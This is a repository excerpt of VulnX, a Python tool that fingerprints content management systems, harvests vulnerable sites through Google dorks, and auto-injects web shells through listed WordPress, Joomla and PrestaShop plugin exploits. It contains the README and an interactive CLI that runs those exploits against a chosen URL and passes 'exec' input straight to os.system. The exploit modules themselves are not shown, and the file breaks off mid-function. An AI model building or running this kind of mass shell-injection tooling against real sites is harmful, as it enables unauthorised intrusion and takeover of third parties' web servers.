--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
5 | VulnX
6 |
9 | VulnX 🕷️ is an intelligent bot and auto shell injector that detects vulnerabilities in multiple types of CMS
10 |
28 | 
29 |
38 | **VulnX** is an intelligent bot and auto [Shell Injector](https://github.com/anouarbensaad/vulnx/wiki/Usage#run-exploits) that detects vulnerabilities in multiple types of CMS, with fast CMS detection, information gathering and vulnerability scanning of the target, such as subdomains, IP addresses, country, org, timezone, region, ans and more.
39 |
40 | Instead of injecting each and every shell manually like all the other tools do, VulnX analyses the target website and checks for the presence of a vulnerability; if one is found, the shell is injected. It also searches for URLs with the [dorks](https://github.com/anouarbensaad/vulnx/wiki/Usage#searching-dorks) tool.
41 |
42 | -------------------------------------
43 |
44 | ### _🕷️ Features_
45 |
46 | - Detects cms (wordpress, joomla, prestashop, drupal, opencart, magento, lokomedia)
47 | - Target information gathering
48 | - Target subdomain gathering
49 | - Multi-threading on demand
50 | - Checks for vulnerabilities
51 | - Auto shell injector
52 | - Exploit dork searcher
53 | - [`Ports Scan`](https://user-images.githubusercontent.com/23563528/58365946-40a83a00-7ec3-11e9-87c5-055ed67109b7.jpg) High Level
54 | - [`Dns`](https://user-images.githubusercontent.com/23563528/58365784-09388e00-7ec1-11e9-8a05-e71fa39f146d.png)-Servers Dump
55 | - Input multiple targets to scan.
56 | - Dorks listing by name and by exploit name.
57 | - Export multiple targets from dorks into a logfile.
58 |
59 | -------------------------------------
60 |
61 |
62 | ### _🕷️ DNS-Map-Results_
63 |
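64 | To do this, run a scan with the `--dns` flag and `-d` for subdomains.
65 | To generate a map of isetso.rnu.tn, you can run the command
66 | `vulnx -u isetso.rnu.tn --dns -d --output $PATH` in a new terminal.
67 |
68 | `$PATH` is a placeholder for the directory where the graph results will be stored; substitute a real directory, since a shell expands a literal `$PATH` to its executable search path.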
69 |
70 | 
71 |
72 |
73 | This generates an image displaying the target's subdomains, MX and DNS data.
74 |
75 |
76 | 
77 |
78 | -------------------------------------
79 |
80 | ### _🕷️ Exploits_
81 |
82 |
83 |
84 |
85 | ##### Joomla
86 | - [x] [Com Jce ]('#')
87 | - [x] [Com Jwallpapers ]('#')
88 | - [x] [Com Jdownloads ]('#')
89 | - [x] [Com Jdownloads2 ]('#')
90 | - [x] [Com Weblinks ]('#')
91 | - [x] [Com Fabrik ]('#')
92 | - [x] [Com Fabrik2 ]('#')
93 | - [x] [Com Jdownloads Index]('#')
94 | - [x] [Com Foxcontact ]('#')
95 | - [x] [Com Blog ]('#')
96 | - [x] [Com Users ]('#')
97 | - [x] [Com Ads Manager ]('#')
98 | - [x] [Com Sexycontactform]('#')
99 | - [x] [Com Media ]('#')
100 | - [x] [Mod_simplefileupload]('#')
101 | - [x] [Com Facileforms ]('#')
102 | - [x] [Com Facileforms ]('#')
103 | - [x] [Com extplorer ]('#')
104 |
105 | ##### Wordpress
106 | - [x] [Simple Ads Manager ](https://www.exploit-db.com/exploits/36614)
107 | - [x] [InBoundio Marketing ](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_inboundio_marketing_file_upload)
108 | - [x] [WPshop eCommerce ](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_wpshop_ecommerce_file_upload)
109 | - [x] [Synoptic ](https://cxsecurity.com/issue/WLB-2017030099)
110 | - [x] [Showbiz Pro ](https://www.exploit-db.com/exploits/35385)
111 | - [x] [Job Manager ](https://www.exploit-db.com/exploits/45031)
112 | - [x] [Formcraft ](https://www.exploit-db.com/exploits/30002)
113 | - [x] [PowerZoom ](http://www.exploit4arab.org/exploits/399)
114 | - [x] [Download Manager ](https://www.exploit-db.com/exploits/35533)
115 | - [x] [CherryFramework ](https://www.exploit-db.com/exploits/45896)
116 | - [x] [Catpro ](https://vulners.com/zdt/1337DAY-ID-20256)
117 | - [x] [Blaze SlideShow ](https://0day.today/exploits/18500)
118 | - [x] [Wysija-Newsletters ](https://www.exploit-db.com/exploits/33991)
119 |
120 | ##### Drupal
121 | - [ ] [Add Admin ]('#')
122 | - [ ] [Drupal BruteForcer ]('#')
123 | - [ ] [Drupal Geddon2 ]('#')
124 |
125 | ##### PrestaShop
126 | - [x] [attributewizardpro ]('#')
127 | - [x] [columnadverts ]('#')
128 | - [ ] [soopamobile ]('#')
129 | - [x] [pk_flexmenu ]('#')
130 | - [x] [pk_vertflexmenu ]('#')
131 | - [x] [nvn_export_orders ]('#')
132 | - [x] [megamenu ]('#')
133 | - [x] [tdpsthemeoptionpanel ]('#')
134 | - [ ] [psmodthemeoptionpanel]('#')
135 | - [x] [masseditproduct ]('#')
136 | - [ ] [blocktestimonial ]('#')
137 | - [x] [soopabanners ]('#')
138 | - [x] [Vtermslideshow ]('#')
139 | - [x] [simpleslideshow ]('#')
140 | - [x] [productpageadverts ]('#')
141 | - [x] [homepageadvertise ]('#')
142 | - [ ] [homepageadvertise2 ]('#')
143 | - [x] [jro_homepageadvertise]('#')
144 | - [x] [advancedslider ]('#')
145 | - [x] [cartabandonmentpro ]('#')
146 | - [x] [cartabandonmentproOld]('#')
147 | - [x] [videostab ]('#')
148 | - [x] [wg24themeadministration]('#')
149 | - [x] [fieldvmegamenu ]('#')
150 | - [x] [wdoptionpanel ]('#')
151 |
152 | ##### Opencart
153 | - [ ] [Opencart BruteForce]('#')
154 |
155 |
156 | -------------------------------------
157 |
158 | ### _🕷️ VulnxMode_
159 | `NEW`
160 | VulnX now has an interactive mode.
161 | ***URLSET***
162 |
163 | 
164 |
165 | ***DORKSET***
166 |
167 | 
168 |
169 | -------------------------------------
170 |
171 |
172 |
173 | ### _🕷️ Available command line options_
174 | [`READ VULNX WIKI`](https://github.com/anouarbensaad/vulnx/wiki/Usage)
175 | ```
176 | usage: vulnx [options]
177 |
178 |   -u --url              url target
179 |   -D --dorks            search webs with dorks
180 |   -o --output           specify output directory
181 |   -t --timeout          http requests timeout
182 |   -c --cms-info         search cms info[themes,plugins,user,version..]
183 |   -e --exploit          searching vulnerability & run exploits
184 |   -w --web-info         web informations gathering
185 |   -d --domain-info      subdomains informations gathering
186 |   -l, --dork-list       list names of dorks exploits
187 |   -n, --number-page     number page of search engine(Google)
188 |   -p, --ports           ports to scan
189 |   -i, --input           specify domains to scan from an input file
190 |   --threads             number of threads
191 |   --dns                 dns informations gathering
192 | ```
193 | -------------------------------------
194 |
195 | ### _🕷️ Docker_
196 |
197 | VulnX in Docker.
198 |
199 | ```bash
200 | $ git clone https://github.com/anouarbensaad/VulnX.git
201 | $ cd VulnX
202 | $ docker build -t vulnx ./docker/
203 | $ docker run -it --name vulnx vulnx:latest -u http://example.com
204 | ```
205 |
206 | Run the vulnx container in interactive mode:
207 |
208 |
209 | 
210 |
211 |
212 | To view the logfiles, mount them in a volume like so:
213 |
214 | ```bash
215 | $ docker run -it --name vulnx -v "$PWD/logs:/VulnX/logs" vulnx:latest -u http://example.com
216 | ```
217 |
218 | Change the [mounting directory](https://github.com/anouarbensaad/vulnx/blob/master/docker/Dockerfile#L46):
219 |
220 | ```Dockerfile
221 | VOLUME [ "$PATH" ]
222 | ```
223 |
224 | -------------------------------------
225 |
226 | ### _🕷️ Install vulnx on Ubuntu_
227 |
228 |
229 | ```bash
230 | $ git clone https://github.com/anouarbensaad/vulnx.git
231 | $ cd vulnx
232 | $ chmod +x install.sh
233 | $ ./install.sh
234 | ```
235 | Now run `vulnx`
236 |
237 | 
238 |
239 |
240 | ### _🕷️ Install vulnx on Termux_
241 |
242 | ```bash
243 | $ pkg update
244 | $ pkg install -y git
245 | $ git clone https://github.com/anouarbensaad/vulnx
246 | $ cd vulnx
247 | $ chmod +x install.sh
248 | $ ./install.sh
249 | ```
250 | [**CLICK HERE TO SHOW THE RESULT**](https://user-images.githubusercontent.com/23563528/58364091-98847800-7ea6-11e9-9a9a-c27717e4dda1.png)
251 |
252 |
253 | ### _🕷️ Install vulnx in Windows_
254 |
255 | - [click here](https://github.com/anouarbensaad/vulnx/archive/master.zip) to download vulnx
256 | - download and install python3
257 | - unzip **vulnx-master.zip** in ***c:/***
258 | - open the command prompt **cmd**.
259 | ```
260 | > cd c:/vulnx-master
261 | > python vulnx.py
262 | ```
263 |
264 | -------------------------------------
265 |
266 | ##### Example command with options: timeout = 3, cms-gathering = all, -d subdomains-gathering, run --exploits
267 | `vulnx -u http://example.com --timeout 3 -c all -d -w --exploit`
268 |
269 | ##### Example commands for searching dorks: -D or --dorks, -l --list-dorks
270 | `vulnx --list-dorks`
271 | Returns a table of exploit names.
272 | `vulnx -D blaze`
273 | Returns the URLs found with the blaze dork.
274 |
275 | -------------------------------------
276 |
277 | ### _🕷️ Versions_
278 | - [v1.9](https://github.com/anouarbensaad/vulnx/releases/tag/v1.9)
279 | - [v1.8](https://github.com/anouarbensaad/vulnx/releases/tag/v1.8)
280 | - [v1.7](https://github.com/anouarbensaad/vulnx/releases/tag/v1.7)
281 | - [v1.6](https://github.com/anouarbensaad/vulnx/releases/tag/v1.6)
282 | - [v1.5](https://github.com/anouarbensaad/vulnx/releases/tag/v1.5)
283 | - [v1.4](https://github.com/anouarbensaad/vulnx/releases/tag/v1.4)
284 | - [v1.3](https://github.com/anouarbensaad/vulnx/releases/tag/v1.3)
285 | - [v1.2](https://github.com/anouarbensaad/vulnx/releases/tag/v1.2)
286 | - [v1.1](https://github.com/anouarbensaad/vulnx/releases/tag/v1.1)
287 |
288 | -------------------------------------
289 |
290 | ### :warning: Warning!
291 |
292 | ***I Am Not Responsible for Any Illegal Use***
293 |
294 | -------------------------------------
295 |
296 | ### _🕷️ Contribution & License_
297 |
298 | You can contribute in the following ways:
299 |
300 | - [Report bugs & add issues](https://github.com/anouarbensaad/VulnX/issues/new)
301 | - Search for new vulnerabilities
302 | - Develop plugins
303 | - Search for exploits
304 | - Give suggestions **(Ideas)** to make it better
305 |
306 | Do you want to have a conversation in private? Email me: Bensaad.tig@gmail.com
307 |
308 | ***VulnX*** is licensed under [GPL-3.0 License](https://github.com/anouarbensaad/VulnX/blob/master/LICENSE)
309 |
--------------------------------------------------------------------------------
/cli.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | import time
4 | import os
5 | import re
6 | import readline
7 | import glob
8 | import subprocess
9 | from common.colors import end,W,R,B,bannerblue2
10 | from common.banner import banner
11 | from common.requestUp import random_UserAgent
12 | from common.uriParser import parsing_url
13 | from modules.wpExploits import( wp_wysija,
14 | wp_blaze,
15 | wp_catpro,
16 | wp_cherry,
17 | wp_dm,
18 | wp_fromcraft,
19 | wp_jobmanager,
20 | wp_showbiz,
21 | wp_synoptic,
22 | wp_shop,
23 | wp_powerzoomer,
24 | wp_revslider,
25 | wp_adsmanager,
26 | wp_inboundiomarketing,
27 | wp_levoslideshow,
28 | wp_adblockblocker,
29 | )
30 |
31 |
32 | url_regx=re.compile(r'^set url .+')
33 | dork_regx=re.compile(r'^dork')
34 | exec_regx=re.compile(r'^exec .+')
35 | help_regx=re.compile(r'^help')
36 | history_regx=re.compile(r'^history')
37 | exit_regx=re.compile(r'^exit')
38 | cls_regx=re.compile(r'^clear')
39 | var_regx=re.compile(r'^variable')
40 | back_regx=re.compile(r'^back')
41 | run_regx=re.compile(r'^run')
42 | output=re.compile(r'^output \w+$')
43 | page=re.compile(r'^page \d+$')
44 | dorkname_regx=re.compile(r'^set dork .+')
45 | list_regx=re.compile(r'^list')
46 |
47 |
48 | headers = {
49 | 'host' : 'google.com',
50 | 'User-Agent' : random_UserAgent(),
51 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
52 | 'Accept-Language': 'en-US,en;q=0.5',
53 | 'Connection': 'keep-alive',}
54 |
55 | history = []
56 |
57 | #VARIABLE
58 | numberpage=1 #default page-dork variable
59 | output_dir='logs' #default output-dork
60 | dorkname=''
61 | url=''
62 | timeout=''
63 |
64 | W_UL= "\033[4m"
65 | RED_U='\033[1;1;91m'
66 |
67 | #autocompleter
68 | autocompleter_global = ["help","clear","use","info","set","variables","history","exec","dork"]
69 | autocompleter_dork = ["help" , "list" , "set dork" , "clear" , "history" ,"variables" ,"exec","back"]
70 | autocompleter_setdork=["help" , "output" ,"page","run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"]
71 | autocompleter_dork_page=["help" , "output" ,"run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"]
72 | autocompleter_dork_output=["help" , "page" ,"run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"]
73 | autocompleter_dork_page_output=["help" ,"run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"]
74 |
75 | vulnresults = set() # results of vulnerability exploits. [success or failed]
76 | grabinfo = set() # return cms_detected the version , themes , plugins , user ..
77 | subdomains = set() # return subdomains & ip.
78 | hostinfo = set() # host info
79 | data = [ vulnresults, grabinfo, subdomains , hostinfo]
80 |
81 | data_names = ['vulnresults', 'grabinfo', 'subdomains' , 'hostinfo']
82 |
83 | data = {
84 | 'vulnresults':list(vulnresults),
85 | 'grabinfo':list(grabinfo),
86 | 'subdomains':list(subdomains),
87 | }
88 |
89 | class Helpers():
90 |
91 |     @staticmethod
92 |     def _general_help():
93 |         print("""
94 |         Command       Description
95 |         --------      -------------
96 |         help/?        Show this help menu.
97 |         clear/cls     clear the vulnx screen
98 |         use           Use an variable.
99 |         info          Get information about an available variable.
100 |         set           Sets a context-specific variable to a value to use while using vulnx.
101 |         variables     Prints all previously specified variables.
102 |         banner        Display banner.
103 |         history       Display command-line most important history from the beginning.
104 |         makerc        Save command-line history to a file.
105 |         exec          Execute a system command without closing the vulnx-mode
106 |         exit/quit     Exit the vulnx-mode
107 |         """)
108 |
109 |     @staticmethod
110 |     def _url_action_help():
111 |         print("""
112 |         Command       Description
113 |         --------      -------------
114 |         help/?        Show this help menu.
115 |         timeout       set timeout
116 |         ports         scan ports
117 |         domain        get domains & sub domains
118 |         cms info      get cms info (version , user ..)
119 |         web info      get web info
120 |         dump dns      dump dns get sub domains [mx-server..]
121 |         run exploit   run exploits corresponding to cms
122 |         clear/cls     clear the vulnx screen
123 |         history       Display command-line most important history from the beginning.
124 |         variables     Prints all previously specified variables.
125 |         back          move back from current context
126 |         """)
127 |
128 |     #dorks - command helpers.
129 |
130 |     @staticmethod
131 |     def _dorks_action_help():
132 |         print("""
133 |         Command       Description
134 |         --------      -------------
135 |         help/?        Show this help menu.
136 |         list          list dorks
137 |         set dork      set exploit name
138 |         clear/cls     clear the vulnx screen
139 |         history       Display command-line most important history from the beginning.
140 |         variables     Prints all previously specified variables.
141 |         exec          Execute a system command without closing the vulnx-mode
142 |         back          move back from current context
143 |         """)
144 |
145 |     @staticmethod
146 |     def _dorks_setdork_help():
147 |         print("""
148 |         Command       Description
149 |         --------      -------------
150 |         help/?        Show this help menu.
151 |         pages         set num page
152 |         output        output file.
153 |         run           search web with specified dork
154 |         clear/cls     clear the vulnx screen
155 |         history       Display command-line most important history from the beginning.
156 |         variables     Prints all previously specified variables.
157 |         exec          Execute a system command without closing the vulnx-mode
158 |         back          move back from current context
159 |         """)
160 |
161 |     @staticmethod
162 |     def _dorks_setdork_page_help():
163 |         print("""
164 |         Command       Description
165 |         --------      -------------
166 |         help/?        Show this help menu.
167 |         output        output file.
168 |         run           search web with specified dork
169 |         clear/cls     clear the vulnx screen
170 |         exec          Execute a system command without closing the vulnx-mode
171 |         history       Display command-line most important history from the beginning.
172 |         variables     Prints all previously specified variables.
173 |         back          move back from current context
174 |         """)
175 |
176 |     @staticmethod
177 |     def _dorks_setdork_output_help():
178 |         print("""
179 |         Command       Description
180 |         --------      -------------
181 |         help/?        Show this help menu.
182 |         pages         set num page
183 |         run           search web with specified dork
184 |         exec          Execute a system command without closing the vulnx-mode
185 |         clear/cls     clear the vulnx screen
186 |         history       Display command-line most important history from the beginning.
187 |         variables     Prints all previously specified variables.
188 |         back          move back from current context
189 |         """)
190 |
191 |     @staticmethod
192 |     def _dorks_setdork_page_output_help():
193 |         print("""
194 |         Command       Description
195 |         --------      -------------
196 |         help/?        Show this help menu.
197 |         run           search web with specified dork
198 |         clear/cls     clear the vulnx screen
199 |         exec          Execute a system command without closing the vulnx-mode
200 |         history       Display command-line most important history from the beginning.
201 |         variables     Prints all previously specified variables.
202 |         back          move back from current context
203 |         """)
204 |
205 | class Cli():
206 |
207 |     def __runExploits(self,url,headers):
208 |         wp_wysija(url,headers,vulnresults)
209 |         wp_blaze(url,headers,vulnresults)
210 |         wp_catpro(url,headers,vulnresults)
211 |         wp_cherry(url,headers,vulnresults)
212 |         wp_dm(url,headers,vulnresults)
213 |         wp_fromcraft(url,headers,vulnresults)
214 |         wp_shop(url,headers,vulnresults)
215 |         wp_revslider(url,headers,vulnresults)
216 |         wp_adsmanager(url,headers,vulnresults)
217 |         wp_inboundiomarketing(url,headers,vulnresults)
218 |         wp_levoslideshow(url,headers,vulnresults)
219 |         wp_adblockblocker(url,headers,vulnresults)
220 |
221 |     def pathCompleter(self,text,state):
222 |         line = readline.get_line_buffer().split()
223 |         return [x for x in glob.glob(text+'*')][state]
224 |
225 |
226 |     def createListCompleter(self,ll):
227 |         def listCompleter(text,state):
228 |             line = readline.get_line_buffer()
229 |             if not line:
230 |                 return [c + " " for c in ll][state]
231 |             else:
232 |                 return [c + " " for c in ll if c.startswith(line)][state]
233 |         self.listCompleter = listCompleter
234 |
235 |     @staticmethod
236 |     def autoComplete_Global():
237 |         t = Cli()
238 |         t.createListCompleter(autocompleter_global)
239 |         readline.set_completer_delims('\t')
240 |         readline.parse_and_bind("tab: complete")
241 |         readline.set_completer(t.listCompleter)
242 |     @staticmethod
243 |     def autoComplete_Dork():
244 |         t = Cli()
245 |         t.createListCompleter(autocompleter_dork)
246 |         readline.set_completer_delims('\t')
247 |         readline.parse_and_bind("tab: complete")
248 |         readline.set_completer(t.listCompleter)
249 |     @staticmethod
250 |     def autoComplete_Page():
251 |         t = Cli()
252 |         t.createListCompleter(autocompleter_dork_page)
253 |         readline.set_completer_delims('\t')
254 |         readline.parse_and_bind("tab: complete")
255 |         readline.set_completer(t.listCompleter)
256 |     @staticmethod
257 |     def autoComplete_Output():
258 |         t = Cli()
259 |         t.createListCompleter(autocompleter_dork_output)
260 |         readline.set_completer_delims('\t')
261 |         readline.parse_and_bind("tab: complete")
262 |         readline.set_completer(t.listCompleter)
263 |     @staticmethod
264 |     def autoComplete_Page_Output():
265 |         t = Cli()
266 |         t.createListCompleter(autocompleter_dork_page_output)
267 |         readline.set_completer_delims('\t')
268 |         readline.parse_and_bind("tab: complete")
269 |         readline.set_completer(t.listCompleter)
270 |     @staticmethod
271 |     def autoComplete_setdork():
272 |         t = Cli()
273 |         t.createListCompleter(autocompleter_setdork)
274 |         readline.set_completer_delims('\t')
275 |         readline.parse_and_bind("tab: complete")
276 |         readline.set_completer(t.listCompleter)
277 |
278 |     @staticmethod
279 |     def dork_variable(dorkname,output,page):
280 |         print("""
281 |         VARIABLE      VALUE
282 |         --------      -----
283 |         dorkname      %s
284 |         output        %s
285 |         pages         %s
286 |
287 |         """%(dorkname,output,page))
288 |
289 |     @staticmethod
290 |     def url_variable(url,timeout):
291 |         print("""
292 |         VARIABLE      VALUE
293 |         --------      -----
294 |         url           %s
295 |         timeout       %s
296 |
297 |         """%(url,timeout))
298 |
299 |     @staticmethod
300 |     def global_variables(dorkname,output,page,url,timeout):
301 |         # The values are passed in the same order as the rows of the table.
302 |         print("""
303 |         VARIABLE      VALUE
304 |         --------      -----
305 |         url           %s
306 |         timeout       %s
307 |         dorkname      %s
308 |         output        %s
309 |         pages         %s
310 |         """%(url,timeout,dorkname,output,page))
311 |
312 |     @staticmethod
313 |     def _clearscreen():
314 |         return os.system('clear')
315 |
316 |     @staticmethod
317 |     def _exec(cmd):
318 |         regx=r'^exec (.+)'
319 |         try:
320 |             command=re.search(re.compile(regx),cmd).group(1)
321 |         except AttributeError: # No match is found
322 |             command=re.search(re.compile(regx),cmd)
323 |         if command:
324 |             return os.system(command)
325 |
326 |     @staticmethod
327 |     def getDork(pattern):
328 |         dork_search=r'^set dork (.+)'
329 |         try:
330 |             dork=re.search(re.compile(dork_search),pattern).group(1)
331 |         except AttributeError: # No match is found
332 |             dork=re.search(re.compile(dork_search),pattern)
333 |         if dork:
334 |             return dork
335 |
336 |     @staticmethod
337 |     def setPage(page):
338 |         page_search=r'^page (\d+$)'
339 |         try:
340 |             page=re.search(re.compile(page_search),page).group(1)
341 |         except AttributeError: # No match is found
342 |             page=re.search(re.compile(page_search),page)
343 |         if page:
344 |             return int(page)
345 |
346 |     @staticmethod
347 |     def setOutput(directory):
348 |         output=r'^output (\w+$)'
349 |         try:
350 |             rep=re.search(re.compile(output),directory).group(1)
351 |         except AttributeError: # No match is found
352 |             rep=re.search(re.compile(output),directory)
353 |         if rep:
354 |             return rep
355 |
356 |     # Plain method: a property cannot take the pattern argument it is called with.
357 |     def getUrl(self,pattern):
358 |         url_search=r'^set url (.+)'
359 |         try:
360 |             url=re.search(re.compile(url_search),pattern).group(1)
361 |         except AttributeError: # No match is found
362 |             url=re.search(re.compile(url_search),pattern)
363 |         if url:
364 |             return url#ParseURL(url)
365 |
366 |
367 |     def setdorkCLI(self,cmd_interpreter):
368 |
369 |         # REGEX
370 |         '''SET DORK VARIABLE'''
371 |
372 |         while True:
373 |             Cli.autoComplete_Dork()
374 |             cmd_interpreter=input("%s%svulnx%s%s (%sDorks%s)> %s" %(bannerblue2,W_UL,end,W,B,W,end))
375 |             history.append(cmd_interpreter)
376 |             if back_regx.search(cmd_interpreter):
377 |                 break
378 |             if list_regx.search(cmd_interpreter):
379 |
380 |                 '''SET DORK LIST'''
381 |
382 |                 print('\n%s[*]%s Listing dorks name..' %(B,end))
383 |                 from modules.dorksEngine import DorkList as DL
384 |                 DL.dorkslist()
385 |             if cls_regx.search(cmd_interpreter) or cmd_interpreter=='cls':
386 |                 Cli._clearscreen()
387 |             if exit_regx.search(cmd_interpreter) or cmd_interpreter == 'quit':
388 |                 sys.exit()
389 |             if help_regx.search(cmd_interpreter) or cmd_interpreter == '?':
390 |                 Helpers._dorks_action_help()
391 |             if history_regx.search(cmd_interpreter):
392 |                 for i in range(len(history)):
393 |                     print(" %s %s"%(i+1,history[i]))
394 |             if exec_regx.search(cmd_interpreter):
395 |                 Cli._exec(cmd_interpreter)
396 |             if var_regx.search(cmd_interpreter):
397 |                 Cli.dork_variable(dorkname,output_dir,numberpage)
398 |
399 |             '''SET DORK NAME.'''
400 |
401 |             if dorkname_regx.search(cmd_interpreter):
402 |                 while True:
403 |                     Cli.autoComplete_setdork()
404 |                     cmd_interpreter_wp=input("%s%svulnx%s%s (%sDorks-%s%s)> %s" %(bannerblue2,W_UL,end,W,B,Cli.getDork(cmd_interpreter),W,end))
405 |                     history.append(cmd_interpreter_wp)
406 |                     '''SET PAGE VARIABLE.'''
407 |                     if page.search(cmd_interpreter_wp):
408 |                         while True:
409 |                             Cli.autoComplete_Page()
410 |                             cmd_interpreter_wp_page=input("%s%svulnx%s%s (%sDorks-%s-%s%s)> %s" %(bannerblue2,W_UL,end,W,B,Cli.getDork(cmd_interpreter),Cli.setPage(cmd_interpreter_wp),W,end))
411 |                             history.append(cmd_interpreter_wp_page)
412 |                             if output.search(cmd_interpreter_wp_page):
413 |                                 while True:
414 |                                     Cli.autoComplete_Page_Output()
415 |                                     cmd_interpreter_wp_page_output=input("%s%svulnx%s%s (%sDorks-%s-%s%s)> %s" %(bannerblue2,W_UL,end,W,B,Cli.getDork(cmd_interpreter),Cli.setPage(cmd_interpreter_wp),W,end))
416 |                                     history.append(cmd_interpreter_wp_page_output)
417 |                                     if run_regx.search(cmd_interpreter_wp_page_output):
418 |                                         print('\n')
419 |                                         from modules.dorksEngine import Dorks as D
420 |                                         D.searchengine(Cli.getDork(cmd_interpreter),headers,Cli.setOutput(cmd_interpreter_wp_page),Cli.setPage(cmd_interpreter_wp)) # the output command was typed at the page prompt
421 |                                     if back_regx.search(cmd_interpreter_wp_page_output):
422 |                                         break
423 |                                     if help_regx.search(cmd_interpreter_wp_page_output) or cmd_interpreter_wp_page_output=='?':
424 |                                         Helpers._dorks_setdork_page_output_help()
425 |                                     if cls_regx.search(cmd_interpreter_wp_page_output) or cmd_interpreter_wp_page_output=='cls':
426 |                                         Cli._clearscreen()
427 |                                     if exit_regx.search(cmd_interpreter_wp_page_output) or cmd_interpreter_wp_page_output == 'quit':
428 |                                         sys.exit()
429 |                                     if history_regx.search(cmd_interpreter_wp_page_output):
430 |                                         for i in range(len(history)):
431 |                                             print(" %s %s"%(i+1,history[i]))
432 |                                     if exec_regx.search(cmd_interpreter_wp_page_output):
433 |                                         Cli._exec(cmd_interpreter_wp_page_output)
434 |                                     if var_regx.search(cmd_interpreter_wp_page_output):
435 |                                         Cli.dork_variable(Cli.getDork(cmd_interpreter),Cli.setOutput(cmd_interpreter_wp_page),Cli.setPage(cmd_interpreter_wp))
436 |
437 |
438 |                             if run_regx.search(cmd_interpreter_wp_page):
439 |                                 print('\n')
440 |                                 from modules.dorksEngine import Dorks as D
441 |                                 D.searchengine(Cli.getDork(cmd_interpreter),headers,output_dir,Cli.setPage(cmd_interpreter_wp))
442 |                             if back_regx.search(cmd_interpreter_wp_page):
443 |                                 break
444 |                             if help_regx.search(cmd_interpreter_wp_page) or cmd_interpreter_wp_page=='?':
445 |                                 Helpers._dorks_setdork_page_help()
446 |                             if cls_regx.search(cmd_interpreter_wp_page) or cmd_interpreter_wp_page=='cls':
447 |                                 Cli._clearscreen()
448 |                             if exit_regx.search(cmd_interpreter_wp_page) or cmd_interpreter_wp_page == 'quit':
449 |                                 sys.exit()
450 |                             if history_regx.search(cmd_interpreter_wp_page):
451 |                                 for i in range(len(history)):
452 |                                     print(" %s %s"%(i+1,history[i]))
453 |                             if exec_regx.search(cmd_interpreter_wp_page):
454 |                                 Cli._exec(cmd_interpreter_wp_page)
455 |                             if var_regx.search(cmd_interpreter_wp_page):
456 |                                 Cli.dork_variable(Cli.getDork(cmd_interpreter),output_dir,Cli.setPage(cmd_interpreter_wp))
457 |
458 |
459 |                     '''SET OUTPUT VARIABLE.'''
460 |
461 |                     if output.search(cmd_interpreter_wp):
462 |                         while True:
463 |                             Cli.autoComplete_Output()
464 |                             cmd_interpreter_wp_output=input("%s%svulnx%s%s (%sDorks-%s%s)> %s" %(bannerblue2,W_UL,end,W,B,Cli.getDork(cmd_interpreter),W,end))
465 |                             history.append(cmd_interpreter_wp_output)
466 |                             if run_regx.search(cmd_interpreter_wp_output):
467 |                                 print('\n')
468 |                                 from modules.dorksEngine import Dorks as D
469 |                                 D.searchengine(Cli.getDork(cmd_interpreter),headers,Cli.setOutput(cmd_interpreter_wp),numberpage)
470 |                             if back_regx.search(cmd_interpreter_wp_output):
471 |                                 break
472 |                             if cls_regx.search(cmd_interpreter_wp_output) or cmd_interpreter_wp_output=='cls':
473 |                                 Cli._clearscreen()
474 |                             if exit_regx.search(cmd_interpreter_wp_output) or cmd_interpreter_wp_output == 'quit':
475 |                                 sys.exit()
476 |                             if help_regx.search(cmd_interpreter_wp_output) or cmd_interpreter_wp_output=='?':
477 |                                 Helpers._dorks_setdork_output_help()
478 |                             if history_regx.search(cmd_interpreter_wp_output):
479 |                                 for i in range(len(history)):
480 |                                     print(" %s %s"%(i+1,history[i]))
481 |                             if exec_regx.search(cmd_interpreter_wp_output):
482 |                                 Cli._exec(cmd_interpreter_wp_output)
483 |                             if var_regx.search(cmd_interpreter_wp_output):
484 |                                 Cli.dork_variable(Cli.getDork(cmd_interpreter),Cli.setOutput(cmd_interpreter_wp),numberpage)
485 |
486 |
487 |                     if run_regx.search(cmd_interpreter_wp):
488 |                         print('\n')
489 |                         from modules.dorksEngine import Dorks as D
490 |                         D.searchengine(Cli.getDork(cmd_interpreter),headers,output_dir,numberpage)
491 |                     if back_regx.search(cmd_interpreter_wp):
492 |                         break
493 |                     if help_regx.search(cmd_interpreter_wp) or cmd_interpreter_wp=='?':
494 |                         Helpers._dorks_setdork_help()
495 |                     if cls_regx.search(cmd_interpreter_wp) or cmd_interpreter_wp=='cls':
496 |                         Cli._clearscreen()
497 |                     if exit_regx.search(cmd_interpreter_wp) or cmd_interpreter_wp == 'quit':
498 |                         sys.exit()
499 |                     if history_regx.search(cmd_interpreter_wp):
500 |                         for i in range(len(history)):
501 |                             print(" %s %s"%(i+1,history[i]))
502 |                     if exec_regx.search(cmd_interpreter_wp):
503 |                         Cli._exec(cmd_interpreter_wp)
504 |                     if var_regx.search(cmd_interpreter_wp):
505 |                         Cli.dork_variable(Cli.getDork(cmd_interpreter),output_dir,numberpage)
506 |
507 |
508 |
509 |     def send_commands(self,cmd):
510 |         while True:
511 |             Cli.autoComplete_Global()
512 |             cmd = input("%s%svulnx%s > "% (bannerblue2,W_UL,end))
513 |             history.append(cmd)
514 |             if url_regx.search(cmd):
515 |                 #url session
516 |                 while True:
517 |                     cmd_interpreter=input("%s%svulnx%s%s target(%s%s%s) > %s" %(bannerblue2,W_UL,end,W,R,self.getUrl(cmd),W,end))
518 |                     history.append(cmd_interpreter)
519 |                     if cmd_interpreter == 'back':
520 |                         break
521 |                     elif cmd_interpreter == 'run exploit':
522 |                         print('\n%s[*]%s Running exploits..' %(B,end))
523 |                         root = self.getUrl(cmd)
524 |                         if root.startswith('http'):
525 |                             url_root = root
526 |                         else:
527 |                             url_root = 'http://'+root # was 'http://'+url_root, which is unbound here
528 |                         self.__runExploits(url_root,headers)
529 |                     elif help_regx.search(cmd_interpreter) or cmd_interpreter == '?':
530 |                         Helpers._url_action_help()
531 |                     elif exit_regx.search(cmd_interpreter) or cmd_interpreter == 'quit':
532 |                         sys.exit()
533 |                     else:
534 |                         print("use (help) (?) to show man commands.")
535 |             elif dork_regx.search(cmd):
536 |                 #dork session
